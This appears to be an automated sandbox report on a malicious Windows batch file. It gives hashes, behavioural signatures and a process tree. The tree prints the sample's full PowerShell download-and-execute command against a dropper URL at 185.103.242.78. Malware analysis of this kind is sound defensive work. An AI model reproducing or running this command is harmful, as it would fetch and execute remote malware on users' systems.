Analysis
max time kernel: 60s
max time network: 61s
platform: windows7_x64
resource: win7
submitted: 10-07-2020 20:10
Static task: static1

Behavioral task: behavioral1
Sample: 2211aeb68404653c6a42054308cf95e6.bat
Resource: win7
0 signatures, 0 seconds

Behavioral task: behavioral2
Sample: 2211aeb68404653c6a42054308cf95e6.bat
Resource: win10v200430
0 signatures, 0 seconds
General
Target: 2211aeb68404653c6a42054308cf95e6.bat
Size: 219B
MD5: 68b33bb8cfe6e6cfbc8be50a90b3084b
SHA1: 8b32c94506fe4bc67c38f6c1dbb955603dbc2ba4
SHA256: 2311d76b97db37109d14a91f693f468810b9e530aa7f6a9d75dc827757054d6a
SHA512: 6a328a1dc19ccddef2bb9aeb38fe874646b7789083360bb026435cb799e93b5a578713a53b45bb52a1f75327bc763054ebf2d2c53d2657dd20d88f89f8f84928
Score: 10/10
Malware Config
Extracted
Language: ps1
Source: URLs
ps1.dropper: http://185.103.242.78/pastes/2211aeb68404653c6a42054308cf95e6
Signatures

Suspicious use of WriteProcessMemory (4 IoCs)
Processes:
  description                       pid   process   target process
  PID 1492 wrote to memory of 892   1492  cmd.exe   powershell.exe
  PID 1492 wrote to memory of 892   1492  cmd.exe   powershell.exe
  PID 1492 wrote to memory of 892   1492  cmd.exe   powershell.exe
  PID 1492 wrote to memory of 892   1492  cmd.exe   powershell.exe

Suspicious behavior: CmdExeWriteProcessMemorySpam (1 IoC)
Processes:
  pid   process
  892   powershell.exe

Suspicious use of AdjustPrivilegeToken (1 IoC)
Processes:
  description               pid   process
  Token: SeDebugPrivilege   892   powershell.exe

Suspicious behavior: EnumeratesProcesses (2 IoCs)
Processes:
  pid   process
  892   powershell.exe
  892   powershell.exe

Blacklisted process makes network request (1 IoC)
Processes:
  flow   pid   process
  3      892   powershell.exe
Processes

Level 1: C:\Windows\system32\cmd.exe
  Command line: cmd /c "C:\Users\Admin\AppData\Local\Temp\2211aeb68404653c6a42054308cf95e6.bat"
  - Suspicious use of WriteProcessMemory

  Level 2: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    Command line: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "IEX (New-Object System.Net.WebClient).DownloadString('http://185.103.242.78/pastes/2211aeb68404653c6a42054308cf95e6');Invoke-LJICDRBAHEGJ;Start-Sleep -s 10000"
    - Suspicious behavior: CmdExeWriteProcessMemorySpam
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious behavior: EnumeratesProcesses
    - Blacklisted process makes network request
Network
MITRE ATT&CK Matrix
Downloads
memory/892-0-0x0000000000000000-mapping.dmp